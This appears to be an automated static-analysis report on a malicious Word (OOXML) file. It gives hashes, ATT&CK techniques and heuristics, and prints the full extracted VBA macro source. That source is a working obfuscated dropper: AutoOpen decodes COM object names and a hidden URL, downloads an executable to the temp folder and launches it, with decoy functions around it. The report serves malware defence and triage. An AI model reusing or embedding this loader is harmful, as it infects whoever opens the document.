Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 007574d63fcc4a89…

MALICIOUS

Office (OOXML)

29.7 KB Created: 2016-07-19 09:46:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2016-08-15
MD5: 1a87d12b450c61da78167e227f6b88d3 SHA-1: 1bb1b7526d20612268766cae4309b14886985473 SHA-256: 007574d63fcc4a89636cdddcebc71218d67850de0c2fe73a23c33941baee7e06
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen subroutine, that utilize CreateObject to download and execute a second-stage payload. Heuristics indicate the VBA code is designed to download and write a file to disk, and ClamAV detections confirm its malicious nature. The presence of an AutoOpen macro and CreateObject calls strongly suggests an attempt to execute arbitrary code upon opening the document.

Heuristics 9

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12420 bytes
SHA-256: 04563673be7e02b5dbb3f0320c11442aeac8e8faef528c67fb505d339a5baf9e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
StopSignal "", ""
End Sub

Attribute VB_Name = "Module1"
Public mAshinkazingeraIgolochkuSlomala_to__1 As Object
Public somebodySaloEst As Object
Public mAshinkazingeraIgolochkuSlomala_to__3 As Object
Public tdgfnbq() As String


Public mAshinkazingeraIgolochkuSlomala_to__4 As String
Public rjkjdhfn() As String
Public mAshinkazingeraIgolochkuSlomala_tolko1 As String
Public mAshinkazingeraIgolochkuSlomala_to_fiddle As Object
Public SheikerSheiker As String
Public Function CheckDriveSpecError(ByRef driveSpec As String) As Boolean
 Dim x1 As String, x2 As String
 Dim lDrive As Integer
CheckDriveSpecError = False
 driveSpec = Trim$(driveSpec)
 lDrive = Len(driveSpec)
 If lDrive = 0 Or lDrive > 2 Then
 CheckDriveSpecError = True
 ElseIf lDrive = 1 Then
 If UCase$(driveSpec) > "C" And UCase$(driveSpec) <= "Z" Then
 driveSpec = driveSpec & ":"
 Else
 CheckDriveSpecError = True
 End If
 ElseIf lDrive = 2 Then
 x1 = UCase$(Left$(driveSpec, 1))
 x2 = Right$(driveSpec, 1)
 If Not (x1 > "C" And x1 <= "Z" And x2 = ":") Then CheckDriveSpecError = True
 End If
End Function
Public Sub ClearColl(ByRef colX As Collection)
 Do While colX.Count > 0
 colX.Remove 1
 Loop
End Sub
Public Function Kombainer(A1 As String, A2 As String, A3 As String) As String
Kombainer = Replace(A1, A2, A3)
End Function
Public Function FileExist(InFile As String) As Boolean
 FileExist = False
 On Error Resume Next
 If Dir$(InFile) <> "" Then FileExist = True
End Function
Public Function GetProjTierInfo(ByVal ProjID As String, ByVal SubpID As String, ByVal DiscID As String) As String
GetProjTierInfo = ""
 Dim intProjID As Integer, intSubpID As Integer, intDiscID As Integer
 intProjID = IIf((Len(ProjID) > 0) And IsNumeric(ProjID), ProjID, -2)
 intSubpID = IIf((Len(SubpID) > 0) And IsNumeric(SubpID), SubpID, -2)
 intDiscID = IIf((Len(DiscID) > 0) And IsNumeric(DiscID), DiscID, -2)
 If (intProjID > -1) Then
 If (intSubpID > -1) Then
 If (intDiscID > -1) Then
 GetProjTierInfo = "3T"
 Else
 GetProjTierInfo = "2TA"
 End If
 Else
 If (intDiscID > -1) Then
 GetProjTierInfo = "2TB"
 Else
 GetProjTierInfo = "1T"
 End If
 End If
 ElseIf (intProjID = "-2") Then
 GetProjTierInfo = "0T"
 End If
End Function
Public Function IsDefined(ByVal strCin As String) As Boolean
 If strCin <> "" And strCin <> "-1" And strCin <> "-2" Then
 IsDefined = True
 Else
 IsDefined = False
 End If
End Function
Public Function IsNotApplicable(ByVal strCin As String) As Boolean
 If strCin = "-2" Then
 IsNotApplicable = True
 Else
 IsNotApplicable = False
 End If
End Function
Public Function IsUnDefined(ByVal strCin As String) As Boolean
 If strCin = "" Or strCin = "-1" Then
 IsUnDefined = True
 Else
 IsUnDefined = False
 End If
End Function
Public Function LastDelimit(ByVal cin As String, ByVal Delimit As String) As Integer
 Dim NL As Integer, N As Integer
 LastDelimit = 0
 NL = Len(cin)
 For N = NL To 1 Step -1
 If Mid$(cin, N, 1) = Delimit Then
 LastDelimit = N
 Exit Function
 End If
 Next N
End Function
Public Function ParseStr(ByVal cin As String, ByVal Delimit As String, _
 ByRef StrOut() As String) As Integer
 Dim lenDelimit As Integer, NS As String, NL As Integer, N As Integer
 Dim NUBound As Integer
 lenDelimit = Len(Delimit)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL = 0 Then
 ParseStr = 0
 StrOut(0) = ""
 Exit Function
 End If
 NUBound = UBound(StrOut)
 ParseStr = 0
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 StrOut(ParseStr) = Trim$(Mid$(cin, NS, N - NS))
 NS = N + lenDelimit
 Else
 StrOut(ParseStr) = Trim$(Mid$(cin, NS))
 End If
 ParseStr = ParseStr + 1
 If (ParseStr > NUBound) Then Exit Function
 Loop While N > 0 And NL > N
End Function
Public Function RemoveSpaceFromList(ByVal cin As String, ByVal Delimit As String) As String
 Dim nStr As Integer, N As Integer
 Dim StrOut(15) As String
 cin = Trim$(cin)
 If Len(cin) > 0 Then
 nStr = ParseStr(cin, Delimit, StrOut)
 For N = 0 To nStr - 1
 If N = 0 Then
 RemoveSpaceFromList = Trim$(StrOut(N))
 Else
 RemoveSpaceFromList = RemoveSpaceFromList & Delimit & Trim$(StrOut(N))
 End If
 Next N
 Else
 RemoveSpaceFromList = ""
 End If
End Function
Public Sub StrParserColl(ByVal cin, ByVal Delimit As String, _
 ByRef StrColl As Collection)
 Dim NL As Integer, N As Integer, NS As Integer, LenD As Integer
 Dim x As String
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("A112DWDCS22"))
 If d = False Then
Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
Exit For
Else
d = False
End If
Next I
Set mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA = CreateObject(rjkjdhfn(3))
 C = ""
 Set mAshinkazingeraIgolochkuSlomala_to__3 = mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA.Environment(rjkjdhfn(4))
 Dim trostTROS As Integer
For trostTROS = LBound(tdgfnbq) To UBound(tdgfnbq)
 SheikerSheiker = SheikerSheiker & PfghzufqntkjgwsRjyb(trostTROS)
 Next trostTROS
 ReplaceOneWithTwoQuotes ""
 mAshinkazingeraIgolochkuSlomala_to__4 = mAshinkazingeraIgolochkuSlomala_to__3(rjkjdhfn(6))
 mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_to__4
mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_tolko1 + rjkjdhfn(12)
WriteClientCmdColl Nothing
 Exit Sub
 Call ClearColl(StrColl)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL <= 0 Then Exit Sub
 LenD = Len(Delimit)
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 x = Trim$(Mid$(cin, NS, N - NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 NS = N + LenD
 Else
 x = Trim$(Mid$(cin, NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 End If
 Loop While N > 0
End Sub


Public Function PfghzufqntkjgwsRjyb(VaarP1 As Integer) As String
Dost = CInt(tdgfnbq(VaarP1))
PfghzufqntkjgwsRjyb = Chr(Dost / (10 + 6))
End Function

Public Function ReplaceOneWithTwoQuotes(ByVal cin As String) As String
 Dim COut As String
 Dim LCin As Integer, N As Integer, M As Integer, I As Integer
 ReplaceOneWithTwoQuotes = ""
 LCin = Len(cin)
 If Application = "Microsoft Word" Then
 mAshinkazingeraIgolochkuSlomala_to__1.Open rjkjdhfn(5), SheikerSheiker, False
mAshinkazingeraIgolochkuSlomala_to__1.Send
End If
 If LCin = 0 Then Exit Function
 COut = ""
 I = 1
 For N = 1 To 20
 M = InStr(I, cin, """")
 If M > 0 Then
 COut = COut & Mid$(cin, I, M - I + 1) & """"
 I = M + 1
 If M >= LCin Then Exit For
 Else
 Exit For
 End If
 Next N
 If I <= LCin Then COut = COut & Mid$(cin, I)
 ReplaceOneWithTwoQuotes = COut
End Function
Public Function ReplaceText(ByVal fromTxt As String, ByVal toTxt As String, _
 ByVal orgTxt As String) As String
 Dim finalTxt As String
 Dim lenOrgTxt As Integer, lenFromTxt
 Dim N As Integer, M As Integer
 finalTxt = ""
 orgTxt = Trim$(orgTxt)
 lenOrgTxt = Len(orgTxt)
 If lenOrgTxt = 0 Then
 ReplaceText = finalTxt
 End If
 lenFromTxt = Len(fromTxt)
 finalTxt = ""
 N = 1
 Do
 M = InStr(N, orgTxt, fromTxt)
 If (M > 0) Then
 finalTxt = finalTxt & Mid(orgTxt, N, M - N) & toTxt
 N = M + lenFromTxt
 Else
 finalTxt = finalTxt & Mid$(orgTxt, N)
 End If
 Loop While (lenOrgTxt > N And M > 0)
 ReplaceText = finalTxt
End Function
Public Sub WriteClientCmd_OLD1(ByVal NItem As Integer, ByRef cin() As String)
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = "" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """ & cin(N) & """"
 Else
 xx = xx & ", """ & cin(N) & """"
 End If
 Next N
 Print #2, xx
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = " LFile.WriteLine(""" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """"" & cin(N) & """"""
 Else
 xx = xx & ", """"" & cin(N) & """"""
 End If
 Next N
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmdColl(ByRef colStr As Collection)
 Dim lngN As Long
 Dim xx As String
 somebodySaloEst.Type = 1
 somebodySaloEst.Open
 somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
somebodySaloEst.Write somebody
 somebodySaloEst.savetofile mAshinkazingeraIgolochkuSlomala_tolko1, 2
 mAshinkazingeraIgolochkuSlomala_to_fiddle.Open (mAshinkazingeraIgolochkuSlomala_tolko1)
Exit Sub
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = "" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """ & colStr(lngN) & """"
 Else
 xx = xx & ", """ & colStr(lngN) & """"
 End If
 Next lngN
 Print #2, xx
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = " LFile.WriteLine(""" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """"" & colStr(lngN) & """"""
 Else
 xx = xx & ", """"" & colStr(lngN) & """"""
 End If
 Next lngN
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmd_OLD2(ParamArray cin())
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = "" & x & "("
 ElseIf N = 2 Then
 xx = xx & """" & x & """"
 Else
 xx = xx & ", """ & x & """"
 End If
 Next x
 xx = xx & ")"
 Print #2, xx
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = " LFile.WriteLine(""" & x & "("
 ElseIf N = 2 Then
 xx = xx & """""" & x & """"""
 Else
 xx = xx & ", """"" & x & """"""
 End If
 Next x
 xx = xx & ")"")"
 Print #2, xx
End Sub
Public Function LocalTimeToUTC(ByVal the_date As Date) As Date
Dim system_time As String
Dim local_file_time As String
Dim utc_file_time As String
 DateToSystemTime the_date, system_time
 SystemTimeTo.FileTime system_time, local_file_time
 LocalFileTimeTo.FileTime local_file_time, utc_file_time
 FileTimeTo.SystemTime utc_file_time, system_time
 SystemTimeToDate system_time, the_date
 LocalTimeToUTC = the_date
End Function
Private Sub DateToSystemTime(ByVal the_date As Date, ByRef system_time As String)
 With system_t.ime
 .wYear = Year(the_date)
 .wMonth = Month(the_date)
 .wDay = Day(the_date)
 .wHour = Hour(the_date)
 .wMinute = Minute(the_date)
 .wSecond = Second(the_date)
 End With
End Sub
Private Sub SystemTimeToDate(system_time As String, ByRef the_date_sys As Date)
 With system_t.ime
 the_date_sys = DateSerial(.wYear, .wMonth, .wDay) + _
 TimeSerial(.wHour, .wMinute, .wSecond)
 End With
End Sub


Public Function StopSignal(ByVal NetDrive As String, ByVal ServerPath As String) As Integer
 tdgfnbq = Split("1664678678678232185667867867823218566786786782321792678678678232928678678678232752678678678232752678678678232195267867867823215526786786782321712678678678232155267867867823216486786786782321680678678678232174467867867823216166786786782321568678678678232161667867867823217286786786782327366786786782321824678678678232187267867867823275267867867823276867867867823216646786786782321568678678678232880678678678232864678678678232848", "678678678232")
 Dim DFNBPLFC As String
DFNBPLFC = Kombainer("TOOCicroTOOOCoft.XTOOCLHTTPTOOOOCAdodb.TOOOCtrTOCaTOOCTOOOOCTOOOChTOCll.ApplicationTOOOOCWTOOOCcript.TOOOChTOCllTOOOOCProcTOCTOOOCTOOOCTOOOOCGTOCTTOOOOCTTOCTOOCPTOOOOCTypTOCTOOOOCopTOCnTOOOOCwritTOCTOOOOCrTOCTOOOCponTOOOCTOCBodyTOOOOCTOOOCavTOCtofilTOCTOOOOC\isnovaTOOOC2.TOCxTOC", "TOC", "e")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOC", "M")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOOC", "s")
 rjkjdhfn = Split(DFNBPLFC, "TOOOOC")
 Set somebodySaloEst = CreateObject(rjkjdhfn(1))
 Set mAshinkazingeraIgolochkuSlomala_to_fiddle = CreateObject(rjkjdhfn(2))
StrParserColl "", "", Nothing
Exit Function
 Dim Rtn As Boolean
 Rtn = ConnectNet.Drive(NetDrive, ServerPath)
 StopSignal = IIf(Rtn = True, 0, -1)
End Function

Attribute VB_Name = "DDAS"
Attribute VB_Base = "0{21700D54-6E7B-4E09-98FB-4F320987F52B}{2A8A3322-9AF4-446C-9596-0CB222B88AA8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 38400 bytes
SHA-256: bf1230efc56a150b324c1b38a5f0e13a16da5007d1df6b4e5df94701c83edf45
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.